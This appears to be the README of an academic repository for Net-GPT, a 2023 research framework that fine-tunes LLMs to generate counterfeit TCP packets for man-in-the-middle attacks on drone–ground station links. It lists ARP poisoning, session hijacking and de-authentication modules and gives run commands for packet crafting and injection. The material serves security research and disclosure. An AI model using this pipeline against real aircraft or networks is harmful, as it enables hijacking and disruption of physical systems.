Brett Piggott1 ·
Siddhant Patil2 ·
Guohuan Feng1 ·
Ibrahim Odat1 ·
Rajdeep Mukherjee1 ·
Balakrishnan Dharmalingam1 ·
Anyi Liu1
1Oakland University 2University of Wisconsin–Madison
Overview · Key Results · Architecture · Quick Start · Attacks · Fine-Tuning · Structure · Citation
- [Dec 2023] 🏆 Paper presented at IEEE/ACM SEC 2023 — Symposium on Edge Computing, Wilmington, DE
- [Nov 2023] 📄 Paper accepted at SEC'23 — Full research paper · DOI: 10.1145/3583740.3626809
- [2023] 🔬 Research artifact and codebase publicly released
"The convergence of Large Language Models with security systems transforms cybersecurity in the AI landscape."
Net-GPT is a research framework demonstrating a novel class of LLM-empowered offensive cyber-physical attacks against Unmanned Aerial Vehicle (UAV) communication systems. The system shows how finely-tuned Large Language Models can be weaponized to:
- 🎯 Understand network protocols — LLMs learn TCP session structure through QLoRA fine-tuning on real packet captures
- 🔀 Launch Man-in-the-Middle attacks — Adversarial UAVs intercept and impersonate benign UAV↔GCS communication
- 📡 Generate mimicked network packets — Context-aligned counterfeit TCP packets generated in real-time via an edge server
- ⚡ Enable edge-computing deployment — Smaller LLMs (Distil-GPT-2) achieve 47× faster response time while retaining ~78% prediction capability
The adversary operates a malicious UAV that joins the same network as a benign UAV and its Ground Control Station (GCS). The malicious UAV leverages a nearby edge server equipped with fine-tuned LLMs to:
- Hijack the benign UAV via ARP poisoning, session hijacking, or de-authentication attacks
- Impersonate both endpoints by generating realistic TCP packets using LLM inference
- Maintain persistent session control using signaling packets (delayed ACK, DupACK, Keep-Alives)
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Benign UAV │◄───────►│ Malicious UAV│◄───────►│ GCS │
│ (Target) │ MITM │ (Attacker) │ MITM │ (Victim) │
└──────────────┘ └──────┬───────┘ └──────────────┘
│
┌──────▼───────┐
│ Edge Server │
│ (RTX 4090) │
│ Fine-tuned │
│ LLM Engine │
└──────────────┘
| Model | Parameters | Overall Accuracy | Response Time |
|---|---|---|---|
| Llama-2-13B | 13B | 95.3% | 108.3 s |
| Llama-2-7B | 7B | 94.1% | — |
| GPT-2 | 137M | 74.2% (of 13B) | 5.18 s (21× faster) |
| Distil-GPT-2 | 82M | 77.9% (of 7B) | 2.31 s (47× faster) |
| Field | Src IP | Dst IP | Src Port | Dst Port | Flags | Seq# | Ack# | Length |
|---|---|---|---|---|---|---|---|---|
| Accuracy | 98.9% | 98.9% | 98.9% | 98.9% | 83.4% | 96.2% | 91.0% | 99.0% |
| Error Count | 0 errors | 1 error | 2 errors | 3–5 errors | 6+ errors |
|---|---|---|---|---|---|
| Rate | 76.2% | 20.3% | 1.9% | 0% | 1.6% |
Over 76% of generated packets are error-free. When errors occur, 96.5% involve only a single field — easily correctable by the adversary.
| Combination | Dataset | Epochs | Accuracy (13B) | Accuracy (7B) |
|---|---|---|---|---|
| Best | 100K | 2 | 96.5% | 97.0% |
| Medium | 60K | 3 | 96.0% | 96.2% |
| Low | 20K | 10 | 93.5% | 92.8% |
Larger datasets with fewer epochs consistently outperform smaller datasets with more epochs — key insight for edge-computing deployment strategies.
Net-GPT operates in a two-phase attack pipeline:
Six attack methods targeting the PX4 autopilot communication layer:
| Attack | Method | MITM | Unauthorized Access | Denial of Service |
|---|---|---|---|---|
| MAC Spoofing | Layer 2 impersonation | ✅ | ✅ | ❌ |
| Session Hijacking | TCP session takeover | ✅ | ✅ | ❌ |
| ARP Poisoning | ARP cache corruption | ✅ | ✅ | ❌ |
| Packet Injection | Crafted packet insertion | ✅ | ✅ | ❌ |
| Flooding Attack | Resource exhaustion | ❌ | ❌ | ✅ |
| De-authentication | WiFi disassociation | ❌ | ✅ | ✅ |
┌─────────────────────────────────────────────────────────────────────┐
│ FINE-TUNING PIPELINE │
│ │
│ Raw PCAP ──► tshark extract ──► JSON format ──► QLoRA tune │
│ (bigFlows) (TCP sessions) (#Previous, (NF4 quant, │
│ 368 MB 6,971 sessions #Predicted, 8 batch, │
│ 791K packets 100K packets #Context) 2e-4 LR) │
└─────────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────────┐
│ INFERENCE PIPELINE │
│ │
│ Intercepted ──► Edge Server ──► Fine-tuned ──► Scapy craft │
│ TCP packet (RTX 4090) LLM predict Inject on │
│ from session Format query next packet network │
└─────────────────────────────────────────────────────────────────────┘
Each training entry follows a structured three-section template:
{
"#Previous_Packet": {
"Src_IP": "192.168.1.10",
"Dst_IP": "192.168.1.20",
"Src_Port": "54321",
"Dst_Port": "80",
"Flag": "ACK",
"Seq": "1001",
"Ack": "2001",
"Length": "512"
},
"#Predicted_Packet": {
"Src_IP": "192.168.1.20",
"Dst_IP": "192.168.1.10",
"Src_Port": "80",
"Dst_Port": "54321",
"Flag": "ACK PSH",
"Seq": "2001",
"Ack": "1513",
"Length": "1024"
},
"#Context": "TCP_SESSION_ID:7042"
}| Dependency | Version | Purpose |
|---|---|---|
| Python | ≥ 3.10 | Runtime |
| PyTorch | ≥ 2.0 | Model training & inference |
| Transformers | ≥ 4.31 | Hugging Face model loading |
| PEFT | ≥ 0.4 | QLoRA fine-tuning |
| bitsandbytes | ≥ 0.40 | NF4 quantization |
| Scapy | ≥ 2.5 | Network packet crafting |
| tshark | ≥ 3.0 | PCAP parsing |
| CUDA | ≥ 11.8 | GPU acceleration |
git clone https://github.com/OdatSec/Net-GPT.git
cd Net-GPT
pip install -r requirements.txt# Download and extract TCP sessions from PCAP
python src/data_preprocessing/pcap_extractor.py \
--input data/raw/bigFlows.pcap \
--output data/processed/train.json \
--max-packets 100000
python src/data_preprocessing/pcap_extractor.py \
--input data/raw/smallFlows.pcap \
--output data/processed/test.json# Fine-tune Llama-2-13B with QLoRA (default config)
python src/fine_tuning/qlora_trainer.py \
--model meta-llama/Llama-2-13b-hf \
--dataset data/processed/train.json \
--epochs 1 \
--output models/llama2-13b-netgpt
# Fine-tune Distil-GPT-2 (edge deployment)
python src/fine_tuning/qlora_trainer.py \
--model distilgpt2 \
--dataset data/processed/train.json \
--epochs 1 \
--output models/distilgpt2-netgpt# Generate predicted packets from intercepted sessions
python src/inference/predict.py \
--model models/llama2-13b-netgpt \
--input data/processed/test.json \
--output results/predictions_llama2_13b.json# Per-field accuracy evaluation
python src/inference/evaluate.py \
--predictions results/predictions_llama2_13b.json \
--ground-truth data/processed/test.json \
--output results/evaluation_llama2_13b.json# Generate Scapy-compatible packets from predictions
python src/packet_crafting/craft_packets.py \
--predictions results/predictions_llama2_13b.json \
--interface eth0| Parameter | Value | Parameter | Value |
|---|---|---|---|
| NF4 Quantization | nf4 |
Logging steps | 10 |
| Batch size/device | 8 |
Learning rate | 2e-4 |
| Gradient steps | 12 |
Global grad norm | 0.3 |
| Paged Optimizer | paged_adamw_32bit |
Warm-up ratio | 0.03 |
| Scheduler | constant |
Epochs | 1–10 |
| Model | Parameters | HuggingFace ID | Use Case |
|---|---|---|---|
| Llama-2-13B | 13B | meta-llama/Llama-2-13b-hf |
High-accuracy server deployment |
| Llama-2-7B | 7B | meta-llama/Llama-2-7b-hf |
Balanced accuracy/speed |
| GPT-2 | 137M | gpt2 |
Compact edge deployment |
| Distil-GPT-2 | 82M | distilgpt2 |
Ultra-fast edge deployment |
| Property | Fine-Tuning (bigFlows) | Testing (smallFlows) |
|---|---|---|
| Size | 368 MB | 9.4 MB |
| Packets | 791,615 | 14,261 |
| Flows | 40,686 | 1,209 |
| Applications | 132 | 28 |
| Avg. Packet Size | 449 bytes | 646 bytes |
| Duration | 5 minutes | 5 minutes |
ARP Poisoning — Layer 2 cache corruption
Corrupts ARP tables on both the target UAV and GCS, redirecting traffic through the malicious UAV. The attacker becomes an invisible relay, enabling full packet interception and modification.
Session Hijacking — TCP session takeover
Exploits the TCP three-way handshake to inject the attacker into an established session. Semi-session and full-session variants allow partial or complete control of the communication channel.
De-authentication — WiFi disassociation attack
Forces the benign GCS to disconnect from the network by sending spoofed de-authentication frames. The malicious UAV then establishes itself as the communication partner.
Packet Injection — Crafted packet insertion
After establishing MITM position, the adversary uses the fine-tuned LLM to generate and inject context-aligned TCP packets that mimic legitimate UAV↔GCS communication patterns.
Net-GPT/
│
├── 📂 src/ Source code package
│ ├── data_preprocessing/
│ │ ├── pcap_extractor.py Extract TCP sessions from PCAP files
│ │ ├── session_parser.py Parse and structure TCP sessions
│ │ └── json_formatter.py Format data for fine-tuning
│ │
│ ├── fine_tuning/
│ │ ├── qlora_trainer.py QLoRA fine-tuning pipeline
│ │ ├── dataset_loader.py Custom dataset for packet prediction
│ │ └── train_config.py Training hyperparameter configs
│ │
│ ├── inference/
│ │ ├── predict.py Generate packet predictions
│ │ ├── evaluate.py Per-field accuracy evaluation
│ │ └── benchmark.py Response time benchmarking
│ │
│ ├── attacks/
│ │ ├── arp_poisoning.py ARP cache poisoning implementation
│ │ ├── session_hijack.py TCP session hijacking
│ │ ├── deauth_attack.py WiFi de-authentication
│ │ └── mitm_controller.py MITM orchestration engine
│ │
│ └── packet_crafting/
│ ├── craft_packets.py Scapy-based packet construction
│ └── session_replayer.py TCP session replay engine
│
├── 📂 configs/
│ ├── qlora_llama2_13b.yaml Llama-2-13B fine-tuning config
│ ├── qlora_llama2_7b.yaml Llama-2-7B fine-tuning config
│ ├── qlora_gpt2.yaml GPT-2 fine-tuning config
│ └── qlora_distilgpt2.yaml Distil-GPT-2 fine-tuning config
│
├── 📂 data/
│ ├── raw/ Raw PCAP captures (user-supplied)
│ └── processed/ Processed JSON for training/testing
│
├── 📂 models/ Fine-tuned model checkpoints
│
├── 📂 results/ Experiment outputs and evaluations
│
├── 📂 figures/ Paper figures and visualizations
│
├── 📂 docs/
│ ├── METHODOLOGY.md Detailed methodology documentation
│ ├── RESULTS.md Comprehensive results tables
│ └── EDGE_DEPLOYMENT.md Edge computing deployment guide
│
├── 📂 scripts/
│ ├── run_all_experiments.sh Reproduce all paper results
│ ├── evaluate_all_models.sh Batch evaluation script
│ └── download_dataset.sh Dataset download helper
│
├── .gitignore Git ignore rules
├── CITATION.cff Machine-readable citation metadata
├── CONTRIBUTING.md Contribution guidelines
├── LICENSE MIT License
├── README.md This file
├── SECURITY.md Security policy & responsible use
└── requirements.txt Python dependencies
The paper systematically investigates three research questions:
Finding: Llama-2-13B (95.3%) marginally outperforms Llama-2-7B (94.1%). The 1.2% gap is surprisingly small given the 2× parameter difference, suggesting model architecture matters more than raw parameter count for protocol understanding tasks.
Finding: 100K packets with 2 epochs produces the best accuracy for both models. Larger datasets remarkably improve the Flags field prediction — critical for sustaining communication sessions. More epochs do not improve smaller LLMs and may even degrade performance.
Finding: Distil-GPT-2 (82M params) achieves 77.9% of Llama-2-7B's capability while being 47× faster (2.31s vs. 108.3s). This enables real-time edge deployment on resource-constrained mobile platforms — crucial for adversarial field operations.
All experiments are fully reproducible:
# Reproduce all paper results end-to-end
bash scripts/run_all_experiments.sh
# Reproduce specific model evaluation
python src/inference/evaluate.py \
--model-name llama2-13b \
--dataset-sizes 20000 40000 60000 80000 100000 \
--epochs 1| Artifact | Path | Description |
|---|---|---|
| Training data | data/processed/train.json |
100K packets from bigFlows |
| Test data | data/processed/test.json |
14,261 packets from smallFlows |
| Model configs | configs/*.yaml |
QLoRA hyperparameters per model |
| Results | results/ |
Per-field accuracy JSON per experiment |
All experiments were conducted in an isolated laboratory environment with UAVs operating under the PX4 autopilot simulation framework. No real airspace, operational networks, production UAV systems, or public wireless infrastructure was involved at any stage of this research.
The attack implementations in this repository are disclosed as part of responsible academic vulnerability research demonstrating how adversarial LLM capabilities extend to network-level physical systems. The intent is to motivate the design of LLM-aware network security defenses for UAV communication infrastructure.
⛔ Do not deploy any attack component against real aircraft, live airspace, operational networks, or systems you do not own and have explicit authorization to test.
This research was reviewed and approved by the institutional review process at Oakland University.
See SECURITY.md for the full security policy.
If Net-GPT contributes to your research, please cite:
@inproceedings{piggott2023netgpt,
title = {{Net-GPT}: A {LLM}-Empowered Man-in-the-Middle Chatbot for
Unmanned Aerial Vehicle},
author = {Piggott, Brett and Patil, Siddhant and Feng, Guohuan and
Odat, Ibrahim and Mukherjee, Rajdeep and
Dharmalingam, Balakrishnan and Liu, Anyi},
booktitle = {Proceedings of the 2023 IEEE/ACM Symposium on Edge Computing (SEC)},
year = {2023},
pages = {287--293},
publisher = {ACM},
address = {Wilmington, DE, USA},
doi = {10.1145/3583740.3626809},
isbn = {979-8-4007-0123-8}
}A CITATION.cff file is included for GitHub's automatic citation tool.
| Project | Venue | Relationship |
|---|---|---|
| AeroMind | RAID 2026 | Memory-poisoning attacks on LLM-driven UAV agents (follow-up work) |
| Heterogeneous Generative Dataset for UASes | IEEE MOST 2023 | Foundational UAV dataset work |
| Author | Affiliation | Role |
|---|---|---|
| Brett Piggott | Oakland University | Lead developer |
| Siddhant Patil | University of Wisconsin–Madison | Contributor |
| Guohuan Feng | Oakland University | Contributor |
| Ibrahim Odat | Oakland University | Contributor |
| Rajdeep Mukherjee | Oakland University | Contributor |
| Balakrishnan Dharmalingam | Oakland University | Contributor |
| Anyi Liu | Oakland University | Principal Investigator |
Net-GPT · IEEE/ACM SEC 2023 · Oakland University · University of Wisconsin–Madison
Released under the MIT License
